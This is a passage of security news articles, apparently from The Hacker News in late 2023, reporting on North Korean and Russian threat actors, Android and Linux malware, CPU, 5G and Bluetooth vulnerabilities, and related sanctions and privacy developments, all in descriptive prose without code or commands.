Also used in the attacks after initial reconnaissance is a custom proxy tool called HazyLoad that was previously identified by Microsoft as used by the threat actor as part of intrusions weaponizing critical security flaws in JetBrains TeamCity (CVE-2023-42793, CVSS score: 9.8). HazyLoad is downloaded and executed by means of another malware called BottomLoader.

Furthermore, Operation Blacksmith has been observed delivering DLRAT, which is both a downloader and a RAT equipped to perform system reconnaissance, deploy additional malware, and retrieve commands from the C2 and execute them in the compromised systems.

"The multiple tools giving overlapping backdoor entry present Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access," the researchers said.

The disclosure comes as the AhnLab Security Emergency Response Center (ASEC) detailed Kimsuky's use of AutoIt versions of malware such as Amadey and RftRAT and distributing them via spear-phishing attacks bearing booby-trapped attachments and links in an attempt to bypass security products.

Kimsuky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is an element operating under North Korea's Reconnaissance General Bureau (RGB), which also houses the Lazarus Group.

It was sanctioned by the U.S. Treasury Department on November 30, 2023, for gathering intelligence to support the regime's strategic objectives.

"After taking control of the infected system, to exfiltrate information, the Kimsuky group installs various malware such as keyloggers and tools for extracting accounts and cookies from web browsers," ASEC said in an analysis published last week.


SpyNote: Beware of This Android Trojan that Records Audio and Phone Calls
16.10.23  OS  The Hacker News

The Android banking trojan known as SpyNote has been dissected to reveal its diverse information-gathering features.

Typically spread via SMS phishing campaigns, attack chains involving the spyware trick potential victims into installing the app by clicking on the embedded link, according to F-Secure.

Besides requesting invasive permissions to access call logs, camera, SMS messages, and external storage, SpyNote is known for hiding its presence from the Android home screen and the Recents screen in a bid to avoid detection.

"The SpyNote malware app can be launched via an external trigger," F-Secure researcher Amit Tambe said in an analysis published last week. "Upon receiving the intent, the malware app launches the main activity."

But most importantly, it seeks accessibility permissions, subsequently leveraging them to grant itself additional permissions to record audio and phone calls, log keystrokes, as well as capture screenshots of the phone via the MediaProjection API.

A closer examination of the malware has revealed the presence of what are called diehard services that aim to resist attempts, either made by the victims or by the operating system, at terminating it.


This is accomplished by registering a broadcast receiver that's designed to restart it automatically whenever it is about to be shut down. What's more, users who attempt to uninstall the malicious app by navigating to Settings are prevented from doing so, as the malware closes the menu screen by abusing the accessibility APIs.

"The SpyNote sample is spyware that logs and steals a variety of information, including key strokes, call logs, information on installed applications, and so on," Tambe said. "It stays hidden on the victim's device making it challenging to notice. It also makes uninstallation extremely tricky."

"The victim is eventually left only with the option of performing a factory reset, losing all data, thereby, in the process."

The disclosure comes as the Finnish cybersecurity firm detailed a bogus Android app that masquerades as an operating system update to entice targets into granting it accessibility services permissions and exfiltrate SMS and bank data.


New PoolParty Process Injection Techniques Outsmart Top EDR Solutions
11.12.23  Hacking  The Hacker News

A new collection of eight process injection techniques, collectively dubbed PoolParty, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems.

SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques."

The findings were first presented at the Black Hat Europe 2023 conference last week.

Process injection refers to an evasion technique used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging.

PoolParty is so named because it's rooted in a component called the Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system.

It works by targeting worker factories – which refer to Windows objects that are responsible for managing thread pool worker threads – and overwriting the start routine with malicious shellcode for subsequent execution by the worker threads.


"Other than the queues, the worker factory that serves as the worker threads manager may be used to take over the worker threads," Leviev noted.

SafeBreach said it was able to devise seven other process injection techniques using the task queue (regular work items), I/O completion queue (asynchronous work items), and the timer queue (timer work items) based on the supported work items.

PoolParty has been found to achieve a 100% success rate against popular EDR solutions, including those from CrowdStrike, Cybereason, Microsoft, Palo Alto Networks, and SentinelOne.

The disclosure arrives nearly six months after Security Joes disclosed another process injection technique dubbed Mockingjay that could be exploited by threat actors to bypass security solutions and execute malicious code on compromised systems.

"Though modern EDRs have evolved to detect known process injection techniques, our research has proven that it is still possible to develop novel techniques that are undetectable and have the potential to make a devastating impact," Leviev concluded.

"Sophisticated threat actors will continue to explore new and innovative methods for process injection, and security tool vendors and practitioners must be proactive in their defense against them."


SLAM Attack: New Spectre-based Vulnerability Impacts Intel, AMD, and Arm CPUs
10.12.23  Attack  The Hacker News

Researchers from the Vrije Universiteit Amsterdam have disclosed a new side-channel attack called SLAM that could be exploited to leak sensitive information from kernel memory on current and upcoming CPUs from Intel, AMD, and Arm.

The attack is an end-to-end exploit for Spectre based on a new feature in Intel CPUs called Linear Address Masking (LAM) as well as its analogous counterparts from AMD (called Upper Address Ignore or UAI) and Arm (called Top Byte Ignore or TBI).

"SLAM exploits unmasked gadgets to let a userland process leak arbitrary ASCII kernel data," VUSec researchers said, adding it could be leveraged to leak the root password hash within minutes from kernel memory.

While LAM is presented as a security feature, the study found that it ironically degrades security and "dramatically" increases the Spectre attack surface, resulting in a transient execution attack, which exploits speculative execution to extract sensitive data via a cache covert channel.

"A transient execution attack exploits the microarchitectural side effects of transient instructions, thus allowing a malicious adversary to access information that would ordinarily be prohibited by architectural access control mechanisms," Intel says in its terminology documentation.

Described as the first transient execution attack targeting future CPUs, SLAM takes advantage of a new covert channel based on non-canonical address translation that facilitates the practical exploitation of generic Spectre gadgets to leak valuable information. It impacts the following CPUs -

Existing AMD CPUs vulnerable to CVE-2020-12965
Future Intel CPUs supporting LAM (both 4- and 5-level paging)
Future AMD CPUs supporting UAI and 5-level paging
Future Arm CPUs supporting TBI and 5-level paging

"Arm systems already mitigate against Spectre v2 and BHB, and it is considered the software's responsibility to protect itself against Spectre v1," Arm said in an advisory. "The described techniques only increase the attack surface of existing vulnerabilities such as Spectre v2 or BHB by augmenting the number of exploitable gadgets."

AMD has also pointed to current Spectre v2 mitigations to address the SLAM exploit. Intel, on the other hand, intends to provide software guidance prior to the future release of Intel processors that support LAM. In the interim, Linux maintainers have developed patches to disable LAM by default.

The findings come nearly two months after VUSec shed light on Quarantine, a software-only approach to mitigate transient execution attacks and achieve physical domain isolation by partitioning the last-level cache (LLC) to give every security domain exclusive access to a different part of the LLC, with the goal of eliminating LLC covert channels.

"Quarantine's physical domain isolation isolates different security domains on separate cores to prevent them from sharing corelocal microarchitectural resources," the researchers said. "Moreover, it unshares the LLC, partitioning it among the security domains."


Researchers Unveil GuLoader Malware's Latest Anti-Analysis Techniques
9.12.23  Virus  The Hacker News

Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging.

"While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs researcher Daniel Stepanic said in a report published this week.

First spotted in late 2019, GuLoader (aka CloudEyE) is an advanced shellcode-based malware downloader that's used to distribute a wide range of payloads, such as information stealers, while incorporating a bevy of sophisticated anti-analysis techniques to dodge traditional security solutions.

A steady stream of open-source reporting into the malware in recent months has revealed the threat actors behind it have continued to improve its ability to bypass existing or new security features alongside other implemented features.

GuLoader is typically spread through phishing campaigns, where victims are tricked into downloading and installing the malware through emails bearing ZIP archives or links containing a Visual Basic Script (VBScript) file.

Israeli cybersecurity company Check Point, in September 2023, revealed that "GuLoader is now sold under a new name on the same platform as Remcos and is implicitly promoted as a crypter that makes its payload fully undetectable by antiviruses."

One of the recent changes to the malware is an improvement of an anti-analysis technique first disclosed by CrowdStrike in December 2022, which is centered around its Vectored Exception Handling (VEH) capability.

It's worth pointing out that the mechanism was previously detailed by both McAfee Labs and Check Point in May 2023, with the former stating that "GuLoader employs the VEH mainly for obfuscating the execution flow and to slow down the analysis."

The method "consists of breaking the normal flow of code execution by deliberately throwing a large number of exceptions and handling them in a vector exception handler that transfers control to a dynamically calculated address," Check Point said.

GuLoader is far from the only malware family to have received constant updates. Another notable example is DarkGate, a remote access trojan (RAT) that enables attackers to fully compromise victim systems.

Sold as malware-as-a-service (MaaS) by an actor known as RastaFarEye on underground forums for a monthly fee of $15,000, the malware uses phishing emails containing links to distribute the initial infection vector: a VBScript or Microsoft Software Installer (MSI) file.

Trellix, which analyzed the latest version of DarkGate (5.0.19), said it "introduces a new execution chain using DLL side-loading and enhanced shellcodes and loaders." Further, it comes with a complete rework of the RDP password theft feature.

"The threat actor has been actively monitoring threat reports to perform quick changes thus evading detections," security researchers Ernesto Fernández Provecho, Pham Duy Phuc, Ciana Driscoll, and Vinoo Thomas said.

"Its adaptability, the speed with which it iterates, and the depth of its evasion methods attest to the sophistication of modern malware threats."

The development comes as remote access trojans like Agent Tesla and AsyncRAT have been observed being propagated using novel email-based infection chains that leverage steganography and uncommon file types in an attempt to bypass antivirus detection measures.


It also follows a report from the HUMAN Satori Threat Intelligence Team about how an updated version of a malware obfuscation engine called ScrubCrypt (aka BatCloak) is being used to deliver the RedLine stealer malware.

"The new ScrubCrypt build was sold to threat actors on a small handful of dark web marketplaces, including Nulled Forum, Cracked Forum, and Hack Forums," the company said.


New 5G Modem Flaws Affect iOS Devices and Android Models from Major Brands
9.12.23  OS  The Hacker News

A collection of security flaws in the firmware implementation of 5G mobile network modems from major chipset vendors such as MediaTek and Qualcomm impact USB and IoT modems as well as hundreds of smartphone models running Android and iOS.

Of the 14 flaws – collectively called 5Ghoul (a combination of "5G" and "Ghoul") – 10 affect 5G modems from the two companies, out of which three have been classified as high-severity vulnerabilities.

"5Ghoul vulnerabilities may be exploited to continuously launch attacks to drop the connections, freeze the connection that involve manual reboot or downgrade the 5G connectivity to 4G," the researchers said in a study published today.

As many as 714 smartphones from 24 brands are impacted, including those from Vivo, Xiaomi, OPPO, Samsung, Honor, Motorola, realme, OnePlus, Huawei, ZTE, Asus, Sony, Meizu, Nokia, Apple, and Google.

The vulnerabilities were disclosed by a team of researchers from the ASSET (Automated Systems SEcuriTy) Research Group at the Singapore University of Technology and Design (SUTD), who also previously uncovered BrakTooth in September 2021 and SweynTooth in February 2020.

The attacks, in a nutshell, attempt to deceive a smartphone or a 5G-enabled device to connect a rogue base station (gNB), resulting in unintended consequences.

"The attacker does not need to be aware of any secret information of the target UE e.g., UE's SIM card details, to complete the NAS network registration," the researchers explained. "The attacker only needs to impersonate the legitimate gNB using the known Cell Tower connection parameters."

A threat actor can accomplish this by using apps like Cellular-Pro to determine the Relative Signal Strength Indicator (RSSI) readings and trick the user equipment into connecting to the adversarial station (i.e., a software-defined radio paired with an inexpensive mini PC).

Notable among the 14 flaws is CVE-2023-33042, which can permit an attacker within radio range to trigger a 5G connectivity downgrade or a denial-of-service (DoS) within Qualcomm's X55/X60 modem firmware by sending a malformed Radio Resource Control (RRC) frame to the target 5G device from a nearby malicious gNB.

Successful exploitation of the other DoS vulnerabilities could require a manual reboot of the device to restore 5G connectivity.

Patches have been released by both MediaTek and Qualcomm for 12 of the 14 flaws. Details of the two other vulnerabilities have been withheld due to confidentiality reasons and are expected to be disclosed in the future.

"Finding issues in the implementation of the 5G modem vendor heavily impacts product vendors downstream," the researchers said, adding that "it can often take six or more months for 5G security patches to finally reach the end-user via an OTA update."

"This is because the software dependency of product vendors on the Modem / Chipset Vendor adds complexity and hence delays to the process of producing and distributing patches to the end-user."


N. Korea's Kimsuky Targeting South Korean Research Institutes with Backdoor Attacks
9.12.23  Virus  The Hacker News

The North Korean threat actor known as Kimsuky has been observed targeting research institutes in South Korea as part of a spear-phishing campaign with the ultimate goal of distributing backdoors on compromised systems.

"The threat actor ultimately uses a backdoor to steal information and execute commands," the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last week.

The attack chains commence with an import declaration lure that's actually a malicious JSE file containing an obfuscated PowerShell script, a Base64-encoded payload, and a decoy PDF document.

The next stage entails opening the PDF file as a diversionary tactic, while the PowerShell script is executed in the background to launch the backdoor.

The malware, for its part, is configured to collect network information and other relevant data (i.e., host name, user name, and operating system version) and transmit the encoded details to a remote server.

It's also capable of running commands, executing additional payloads, and terminating itself, turning it into a backdoor for remote access to the infected host.

Kimsuky, active since at least 2012, started off targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, before expanding its victimology footprint to encompass Europe, Russia, and the U.S.

Earlier this month, the U.S. Treasury Department sanctioned Kimsuky for gathering intelligence to support North Korea's strategic objectives, including geopolitical events, foreign policy, and diplomatic efforts.

"Kimsuky has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions," cybersecurity firm ThreatMon noted in a recent report.

The state-sponsored group has also been observed leveraging booby-trapped URLs that, when clicked, download a bogus ZIP archive masquerading as an update for the Chrome browser to deploy a malicious VBScript from Google Drive that employs the cloud storage as a conduit for data exfiltration and command-and-control (C2).

Lazarus Group Goes Phishing on Telegram
The development comes as blockchain security company SlowMist implicated the notorious North Korea-backed outfit called the Lazarus Group in a widespread phishing campaign on Telegram targeting the cryptocurrency sector.

"More recently, these hackers have escalated their tactics by posing as reputable investment institutions to execute phishing scams against various cryptocurrency project teams," the Singapore-based firm said.

After establishing rapport, the targets are deceived into downloading a malicious script under the guise of sharing an online meeting link that facilitates crypto theft.

It also follows a report from the Seoul Metropolitan Police Agency (SMPA) that accused the Lazarus sub-cluster codenamed Andariel of stealing technical information about anti-aircraft weapon systems from domestic defense companies and laundering ransomware proceeds back to North Korea.


It is estimated that more than 250 files amounting to 1.2 terabytes have been stolen in the attacks. To cover up the tracks, the adversary is said to have used servers from a local company that "rents servers to subscribers with unclear identities" as an entry point.

In addition, the group extorted 470 million won ($356,000) worth of bitcoin from three South Korean firms in ransomware attacks and laundered them through virtual asset exchanges such as Bithumb and Binance. It's worth noting that Andariel has been linked to the deployment of Maui ransomware in the past.


Mac Users Beware: New Trojan-Proxy Malware Spreading via Pirated Software
9.12.23  OS  The Hacker News


Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new Trojan-Proxy malware.

"Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan said.

The Russian cybersecurity firm said it found evidence indicating that the malware is a cross-platform threat, owing to artifacts unearthed for Windows and Android that piggybacked on pirated tools.

The macOS variants propagate under the guise of legitimate multimedia, image editing, data recovery, and productivity tools. This suggests that users searching for pirated software are the targets of the campaign.

Unlike their genuine, unaltered counterparts, which are offered as disk image (.DMG) files, the rogue versions are delivered in the form of .PKG installers, which come equipped with a post-install script that activates the malicious behavior post installation.

"As an installer often requests administrator permissions to function, the script run by the installer process inherits those," Puzan noted.

The end goal of the campaign is to launch the Trojan-Proxy, which masks itself as the WindowServer process on macOS to evade detection. WindowServer is a core system process responsible for window management and rendering the graphical user interface (GUI) of applications.

Upon start, it attempts to obtain the IP address of the command-and-control (C2) server to connect to via DNS-over-HTTPS (DoH) by encrypting the DNS requests and responses using the HTTPS protocol.

Trojan-Proxy subsequently establishes contact with the C2 server and awaits further instructions, including processing incoming messages to parse the IP address to connect to, the protocol to use, and the message to send, signaling its ability to act as a proxy over TCP or UDP and redirect traffic through the infected host.

Kaspersky said it found samples of the malware uploaded to the VirusTotal scanning engine as early as April 28, 2023. To mitigate such threats, users are recommended to avoid downloading software from untrusted sources.


WordPress Releases Update 6.4.2 to Address Critical Remote Attack Vulnerability
9.12.23  Vulnerability  The Hacker News

WordPress has released version 6.4.2 with a patch for a critical security flaw that could be exploited by threat actors by combining it with another bug to execute arbitrary PHP code on vulnerable sites.

"A remote code execution vulnerability that is not directly exploitable in core; however, the security team feels that there is a potential for high severity when combined with some plugins, especially in multisite installations," WordPress said.

According to WordPress security company Wordfence, the issue is rooted in the WP_HTML_Token class that was introduced in version 6.4 to improve HTML parsing in the block editor.

A threat actor with the ability to exploit a PHP object injection vulnerability present in any other plugin or theme could chain the two issues to execute arbitrary code and seize control of the targeted site.

"If a POP [property-oriented programming] chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code," Wordfence noted previously in September 2023.


In a similar advisory released by Patchstack, the company said an exploitation chain has been made available on GitHub as of November 17 and added to the PHP Generic Gadget Chains (PHPGGC) project. It's recommended that users manually check their sites to ensure that they're updated to the latest version.

"If you are a developer and any of your projects contain function calls to the unserialize function, we highly recommend you swap this with something else, such as JSON encoding/decoding using the json_encode and json_decode PHP functions," Patchstack CTO Dave Jong said.


Founder of Bitzlato Cryptocurrency Exchange Pleads Guilty in Money-Laundering Scheme
8.12.23  Cryptocurrency  The Hacker News

The Russian founder of the now-defunct Bitzlato cryptocurrency exchange has pleaded guilty, nearly 11 months after he was arrested in Miami earlier this year.

Anatoly Legkodymov (aka Anatolii Legkodymov, Gandalf, and Tolik), according to the U.S. Justice Department, admitted to operating an unlicensed money-transmitting business that enabled other criminal actors to launder their illicit proceeds. He faces up to five years in prison.

"Legkodymov operated a cryptocurrency exchange that was open for business to money launderers and other criminals," said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department's Criminal Division.

"He profited from catering to criminals, and now he must pay the price. Transacting in cryptocurrency does not put you beyond the reach of the law."

Bitzlato, which served as a safe haven for fraudsters and ransomware crews such as Conti, is estimated to have received $2.5 billion in cryptocurrency between 2019 and 2023, more than half of which originated from illegal and risky sources.

Prior to its takedown by law enforcement, the Hong Kong-registered exchange also drew attention for its lax know-your-customer (KYC) procedures and marketed itself as a platform that required only minimal identifying information from its users. Some of its users are believed to have registered accounts using stolen identity documents.

The Justice Department also singled out the Hydra darknet marketplace as Bizlato's largest counterparty in cryptocurrency transactions, with the former's users exchanging no less than $700 million worth of digital assets with the exchange.

Hydra was the world's largest and longest-running dark web marketplace for narcotics, stolen financial information, fraudulent identification documents, and money laundering services. It was dismantled by German and U.S. authorities in April 2022.

"Legkodymov's guilty plea today confirms that he was well aware that Bitzlato, his cryptocurrency exchange, was being used like an open turnstile by criminals eager to take advantage of his lax controls over illicit money transactions," said U.S. Attorney Breon Peace for the Eastern District of New York.


Microsoft Warns of COLDRIVER's Evolving Evasion and Credential-Stealing Tactics
8.12.23  Hacking  The Hacker News

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.

The Microsoft Threat Intelligence team is tracking the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446.

The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.

Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017.

In August 2023, Recorded Future revealed 94 new domains that are part of the threat actor's attack infrastructure, most of which feature keywords related to information technology and cryptocurrency.

Microsoft said it observed the adversary leveraging server-side scripts to prevent automated scanning of the actor-controlled infrastructure starting April 2023, moving away from hCaptcha to determine targets of interest and redirecting the browsing session to the Evilginx server.

The server-side JavaScript code is designed to check if the browser has any plugins installed and if the page is being accessed by an automation tool like Selenium or PhantomJS, and to transmit the results to the server in the form of an HTTP POST request.

"Following the POST request, the redirector server assesses the data collected from the browser and decides whether to allow continued browser redirection," Microsoft said.


"When a good verdict is reached, the browser receives a response from the redirection server, redirecting to the next stage of the chain, which is either an hCaptcha for the user to solve, or direct to the Evilginx server."

Also newly used by Star Blizzard are email marketing services like HubSpot and MailerLite to craft campaigns that serve as the starting point of the redirection chain that culminates at the Evilginx server hosting the credential harvesting page.

In addition, the threat actor has been observed using a domain name service (DNS) provider to resolve actor-registered domain infrastructure, sending password-protected PDF lures that embed the links to evade email security processes, and hosting the files on Proton Drive.

That's not all. In a sign that the threat actor is actively keeping tabs on public reporting into its tactics and techniques, it has now upgraded its domain generation algorithm (DGA) to include a more randomized list of words when naming them.

Despite these changes, "Star Blizzard activities remain focused on email credential theft, predominantly targeting cloud-based email providers that host organizational and/or personal email accounts," Microsoft said.

"Star Blizzard remains constant in their use of pairs of dedicated VPSs to host actor-controlled infrastructure (redirector + Evilginx servers) used for spear-phishing activities, where each server usually hosts a separate actor registered domain."

U.K. and U.S. Sanction Two Members of Star Blizzard
The development comes as the U.K. called out Star Blizzard for "sustained unsuccessful attempts to interfere in U.K. political processes" by targeting high-profile individuals and entities through cyber operations.

Besides linking Star Blizzard to Centre 18, a subordinate element within FSB, the U.K. government sanctioned two members of the hacking crew – Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets (aka Alexey Doguzhiev) – for their involvement in the spear-phishing campaigns.

The activity "resulted in unauthorized access and exfiltration of sensitive data, which was intended to undermine UK organizations and more broadly, the UK government," it said.

The Five Eyes intelligence alliance comprising Australia, Canada, New Zealand, the U.K., and the U.S. further highlighted the threat actor's pattern of impersonating known contacts' email accounts to appear trustworthy, creating fabricated social media profiles, and creating malicious domains that resemble legitimate organizations.

The spear-phishing attacks are preceded by a research and preparatory phase to conduct reconnaissance of their targets, before approaching them via their personal email addresses in a likely attempt to bypass security controls on corporate networks and build rapport in hopes of ultimately delivering links that mimic the sign-in page for a legitimate service.

"The sender address could be from any free email provider, but special attention should be paid to emails received from Proton account senders (@proton.me, @protonmail.com) as they are frequently used by Star Blizzard," Microsoft said.

The credentials entered by the targets on these pages are then captured and used to access the victims' emails and attachments, not to mention their contacts list, which are subsequently used for follow-on phishing activity via the compromised accounts.

In a newly unsealed indictment against Peretyatko and Korinets, the U.S. Department of Justice (DoJ) said the defendants used spoofed email accounts to send messages that purported to come from email providers suggesting the recipients had violated terms of service, but, in actuality, were engineered to trick them into providing their email account credentials to false login prompts.

The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) implicated the FSB in long-running hack-and-leak operations with the goal of shaping narratives in targeted countries and advancing Russia's strategic interests.

It also accused Korinets of setting up at least 39 bogus credential harvesting domains for phishing campaigns between 2016 and 2020. Peretyatko is alleged to have used a fraudulent email account in 2017 to send phishing emails that redirected victims to a malicious domain created by Korinets.

"Peretyatko and other FSB officers responsible for the spear phishing campaigns have researched new tools that would support their malicious cyber activities," the Treasury Department said.

"One of the tools included malware that allows for the evasion of two-factor authentication, another permits for the control of a device with limited risk of detection, and a third that allows access to webmail inboxes."

The sanctions notwithstanding, the U.S. Department of State has also announced a $10 million reward for any information leading to the identification of Star Blizzard's members and their activities as part of its Rewards for Justice (RFJ) program.

Responding to the sanctions blockade, the Russian Embassy in the U.K. characterized it as a "futile move" and "yet another act of poorly staged drama," with President Vladimir Putin stating "Western elites use sanctions, provoking conflicts in whole macro-regions in an attempt to maintain their slipping domination."


New Bluetooth Flaw Let Hackers Take Over Android, Linux, macOS, and iOS Devices
8.12.23  Exploit  The Hacker News

A critical Bluetooth security flaw could be exploited by threat actors to take control of Android, Linux, macOS and iOS devices.

Tracked as CVE-2023-45866, the issue relates to a case of authentication bypass that enables attackers to connect to susceptible devices and inject keystrokes to achieve code execution as the victim.

"Multiple Bluetooth stacks have authentication bypass vulnerabilities that permit an attacker to connect to a discoverable host without user confirmation and inject keystrokes," said security researcher Marc Newlin, who disclosed the flaws to the software vendors in August 2023.

Specifically, the attack deceives the target device into thinking that it's connected to a Bluetooth keyboard by taking advantage of an "unauthenticated pairing mechanism" that's defined in the Bluetooth specification.

Successful exploitation of the flaw could permit an adversary in close physical proximity to connect to a vulnerable device and transmit keystrokes to install apps and run arbitrary commands.

It's worth pointing out that the attack does not require any specialized hardware, and can be performed from a Linux computer using a regular Bluetooth adapter. Additional technical details of the flaw are expected to be released in the future.

The vulnerability affects a wide range of devices running Android (going back to version 4.2.2, which was released in November 2012), iOS, Linux, and macOS.

Further, the bug affects macOS and iOS when Bluetooth is enabled and a Magic Keyboard has been paired with the vulnerable device. It also works in Apple's LockDown Mode, which is meant to secure against sophisticated digital threats.

In an advisory released this month, Google said CVE-2023-45866 "could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed."


Governments May Spy on You by Requesting Push Notifications from Apple and Google
8.12.23  Phishing  The Hacker News

Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden.

"Push notifications are alerts sent by phone apps to users' smartphones," Wyden said.

"These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of that structure, the two companies have visibility into how their customers use apps and could be compelled to provide this information to U.S. or foreign governments."

Wyden, in a letter to U.S. Attorney General Merrick Garland, said both Apple and Google confirmed receiving such requests but noted that information about the practice was restricted from public release by the U.S. government, raising questions about the transparency of legal demands they receive from governments.

When mobile apps for Android and iOS send push notifications to users' devices, they are routed through Apple and Google's own infrastructure known as the Apple Push Notification (APN) service and Firebase Cloud Messaging, respectively. Microsoft and Amazon have similar systems in place called Windows Push Notification Service (WNS) and Amazon Device Messaging (ADM).

As a result, the letter alleges that both companies can be compelled by governments to hand over the information. It's currently not clear which governments have sought notification data from Apple and Google.

That said, the U.S. is one among them, according to the Washington Post, which found more than two dozen search warrant applications related to federal requests for push notification data.

"The data these two companies receive includes metadata, detailing which app received a notification and when, as well as the phone and associated Apple or Google account to which that notification was intended to be delivered," the letter read.

"In certain instances, they also might also receive unencrypted content, which could range from backend directives for the app to the actual text displayed to a user in an app notification."

It also urged that Apple and Google should be permitted to disclose whether they have facilitated this practice, and if so, publish aggregate statistics about the number of demands they receive, and notify specific customers about demands for their data.

In a statement shared with Reuters, which first reported the development, Apple said the letter gave them the "opening" they needed to share more details about how governments monitored push notifications.

"When users allow an application they have installed to receive push notifications, an Apple Push Notification Service (APNs) token is generated and registered to that developer and device," Apple now notes in its updated Legal Process Guidelines document [PDF].

"Some apps may have multiple APNs tokens for one account on one device to differentiate between messages and multi-media. The Apple ID associated with a registered APNs token may be obtained with a subpoena or greater legal process."

Google, meanwhile, noted that it already publishes this information in its transparency reports although it's not specifically broken down by government requests for push notification records.


New Stealthy 'Krasue' Linux Trojan Targeting Telecom Firms in Thailand
7.12.23  Virus  The Hacker News

A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to maintain covert access to victim networks at least since 2021.

Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report shared with The Hacker News.

The exact initial access vector used to deploy Krasue is currently not known, although it's suspected that it could be via vulnerability exploitation, credential brute-force attacks, or downloaded as part of a bogus software package or binary. The scale of the campaign is

The malware's core functionalities are realized through a rootkit that allows it to maintain persistence on the host without attracting any attention. The rootkit is derived from open-source projects such as Diamorphine, Suterusu, and Rooty.

This has raised the possibility that Krasue is either deployed as part of a botnet or sold by initial access brokers to other cybercriminals, such as ransomware affiliates, who are looking to obtain access to a specific target.

"The rootkit can hook the `kill()` syscall, network-related functions, and file listing operations in order to hide its activities and evade detection," Group-IB malware analyst Sharmine Low said.


"Notably, Krasue uses RTSP (Real Time Streaming Protocol) messages to serve as a disguised 'alive ping,' a tactic rarely seen in the wild."

The trojan's command-and-control (C2) communications further allow it to designate a communicating IP as its master upstream C2 server, get information about the malware, and even terminate itself.

Krasue also shares several source code similarities with another Linux malware named XorDdos, indicating that it has been developed by the same author as the latter, or by actors who had access to its source code.

"The information available is not enough to put forward a conclusive attribution as to the creator of Krasue, or the groups that are leveraging it in the wild, but the fact that these malicious programs are able to remain under the radar for extended periods makes it clear that continuous vigilance and better security measures are necessary," Low said.


Meta Launches Default End-to-End Encryption for Chats and Calls on Messenger
7.12.23  Social  The Hacker News

Meta has officially begun to roll out support for end-to-end encryption (E2EE) in Messenger for personal calls and one-to-one personal messages by default in what it called the "most significant milestone yet."

"This isn't a routine security update: we rebuilt the app from the ground up, in close consultation with privacy and safety experts," Loredana Crisan, vice president of Messenger at Meta, said in a post shared on X (formerly Twitter).

CEO Mark Zuckerberg, who announced a "privacy-focused vision for social networking" back in 2019, said the update comes "after years of work" redesigning the platform. It's worth noting that E2EE for group messaging in Messenger is still in the testing phase.

Encrypted chats were first introduced in Messenger as an opt-in feature called "secret conversations" in Messenger in 2016. Meta's Instagram also has support for E2EE for messages and calls but it's "only available in some areas" and not enabled by default.

"The extra layer of security provided by end-to-end encryption means that the content of your messages and calls with friends and family are protected from the moment they leave your device to the moment they reach the receiver's device," Crisan said.

In August 2023, the social media giant said that it was on track to widely enable the feature by the end of the year but emphasized that it had to re-architect Messenger to ensure that its servers cannot process or validate messages passing through them.

To that end, it not only upgraded over 100 features to incorporate encryption, but also developed new ways for users to manage their message history between devices, like setting up a PIN, by building a new encrypted storage system called Labyrinth.

The PIN is used as a recovery method after the chat upgrade in Messenger so as to help users restore their messages should they lose, change, or add a device to their account.

"Labyrinth – a novel encrypted message storage protocol – aims to address a number of these challenges by enabling users to store their messages server-side, while also maintaining strong privacy," the company said in a whitepaper.

"It is designed to protect messages against non-members (devices and entities which are not enrolled in a user's Labyrinth mailbox), including preventing new messages from being decryptable on revoked devices which may have previously had access to earlier messages, while achieving low operational overheads and high reliability."


Alert: Threat Actors Can Leverage AWS STS to Infiltrate Cloud Accounts
7.12.23  Hacking  The Hacker News

Threat actors can take advantage of Amazon Web Services Security Token Service (AWS STS) as a way to infiltrate cloud accounts and conduct follow-on attacks.

The service enables threat actors to impersonate user identities and roles in cloud environments, Red Canary researchers Thomas Gardner and Cody Betsworth said in a Tuesday analysis.

AWS STS is a web service that enables users to request temporary, limited-privilege credentials for users to access AWS resources without needing to create an AWS identity. These STS tokens can be valid anywhere from 15 minutes to 36 hours.

Threat actors can steal long-term IAM tokens through a variety of methods like malware infections, publicly exposed credentials, and phishing emails, subsequently using them to determine roles and privileges associated with those tokens via API calls.

"Depending on the token's permission level, adversaries may also be able to use it to create additional IAM users with long-term AKIA tokens to ensure persistence in the event that their initial AKIA token and all of the ASIA short term tokens it generated are discovered and revoked," the researchers said.

